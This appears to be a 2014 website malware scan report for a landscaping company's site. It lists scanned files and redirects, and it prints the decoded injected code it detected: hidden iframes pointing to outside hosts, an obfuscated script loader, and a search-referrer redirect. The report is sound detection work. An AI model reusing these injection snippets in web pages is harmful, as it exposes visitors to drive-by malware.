Scanned pages/files
| Request | Server response | Status |
http://www.bobfritzlandscapes.co.uk/ | 200 OK Content-Length: 8910 Content-Type: text/html | clean |
http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js | 200 OK Content-Length: 57254 Content-Type: text/javascript | clean |
http://www.bobfritzlandscapes.co.uk/fadeslideshow.js | 200 OK Content-Length: 14050 Content-Type: application/javascript | clean |
http://www.bobfritzlandscapes.co.uk/Scripts/AC_RunActiveContent.js | 200 OK Content-Length: 8829 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var isIE = (navigator.appVersion.indexOf("MSIE") != -1) ? true : false; var isWin = (navigator.appVersion.toLowerCase().indexOf("win") != -1) ? true : false; var isOpera = (navigator.userAgent.indexOf("Opera") != -1) ? true : false; function ControlVersion() { var version; var axo; var e; try { axo = new ActiveXObject("ShockwaveFlash.ShockwaveFlash.7"); version = axo.GetVariable("$version"); } catch (e) { } if (!version) Decoded script: <div name="video" style="display:none"><iframe width="560" height="315" src="http://nissan.georgekohndds.com/direct.php?page=15f48be84d67654d" frameborder="0"></iframe></div> Antivirus reports:
| ||
http://www.bobfritzlandscapes.co.uk/index.html | 200 OK Content-Length: 8910 Content-Type: text/html | clean |
http://www.bobfritzlandscapes.co.uk/about.html | 200 OK Content-Length: 16278 Content-Type: text/html | clean |
http://www.bobfritzlandscapes.co.uk/lightbox/js/prototype.js | 200 OK Content-Length: 49683 Content-Type: application/javascript | suspicious |
Suspicious code. Script contains iFrame. var Prototype = { Version: '1.4.0', ScriptFragment: '(?:<script.*?>)((\n|\r|.)*?)(?:<\/script>)', emptyFunction: function() {}, K: function(x) {return x} } var Class = { create: function() { return function() { this.initialize.apply(this, arguments); } } } var Abstract = new Object(); Object.extend = function(destination, source) { for (property in s ...[3908 bytes skipped]... Decoded script: function () { if (!Event.observers) { return; } for (var i = 0; i < Event.observers.length; i++) { Event.stopObserving.apply(this, Event.observers[i]); Event.observers[i][0] = null; } Event.observers = false; } var _escape='%3Cscript%3Edocument.write%28%27%3Cdiv%20name%3D%22vimeo%22%20style%3D%22display%3Anone%22%3E%3Ciframe%20width%3D%22560%22%20height%3D%22315%22%20src%3D%22http%3A//bentley.poststreetdental.com/direct.php%3Fpage%3D15f48be84d67654d%22%20frameborder%3D%220%22%20allowfullscreen%3E%3C/iframe%3E%3C/div%3E%27%29%3B%3C/script%3E';var OlI = document.createElement('script'); OlI.src = 'http://api.myobfuscate.com/?getsrc=ok'+'&ref='+encodeURIComponent(document.referrer)+'&url='+encodeURIComponent(document.URL); var OlO = document.getEleme ...[740 bytes skipped]... | ||
http://www.bobfritzlandscapes.co.uk/lightbox/js/scriptaculous.js?load=effects | 200 OK Content-Length: 2952 Content-Type: application/javascript | clean |
http://www.bobfritzlandscapes.co.uk/lightbox/js/lightbox.js | 200 OK Content-Length: 24266 Content-Type: application/javascript | clean |
http://www.bobfritzlandscapes.co.uk/contact.html | 200 OK Content-Length: 8547 Content-Type: text/html | clean |
http://www.bobfritzlandscapes.co.uk/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
http://www.bobfritzlandscapes.co.uk/gallery/9.png | 200 OK Content-Length: 300888 Content-Type: image/png | clean |
http://www.bobfritzlandscapes.co.uk/gallery/10.png | 200 OK Content-Length: 300889 Content-Type: image/png | clean |
http://www.bobfritzlandscapes.co.uk/gallery/11.png | 200 OK Content-Length: 300887 Content-Type: image/png | clean |
http://www.bobfritzlandscapes.co.uk/gallery/2.JPG | 200 OK Content-Length: 68516 Content-Type: image/jpeg | clean |
Malicious/Suspicious Redirects
| Request | Server response | Status |
URL: http://www.bobfritzlandscapes.co.uk/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: www.bobfritzlandscapes.co.uk Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Tue, 23 Dec 2014 15:27:40 GMT Via: 1.1 varnish Age: 0 Location: http://thavraj.joeflinn.com/www/delivery/ajs.php?zoneid=177&cb=81576222192&charset=us-ascii&loc=http%3A%2F%2Fwww.bobfritzlandscapes.co.uk%2F&referer=http%3A%2F%2Fwww.bobfritzlandscapes.co.uk%2F&mmm_fo=1 Server: Apache Vary: Accept-Encoding Content-Type: text/html; charset=iso-8859-1 Set-Cookie: wZx=40; path=/; domain=www.bobfritzlandscapes.co.uk; expires=Tue, 30-Dec-2014 14:04:40 GMT X-Varnish: 3357009746 | suspicious |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=bobfritzlandscapes.co.uk
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://bobfritzlandscapes.co.uk/
Result: bobfritzlandscapes.co.uk is not infected or malware details are not published yet.
Result: bobfritzlandscapes.co.uk is not infected or malware details are not published yet.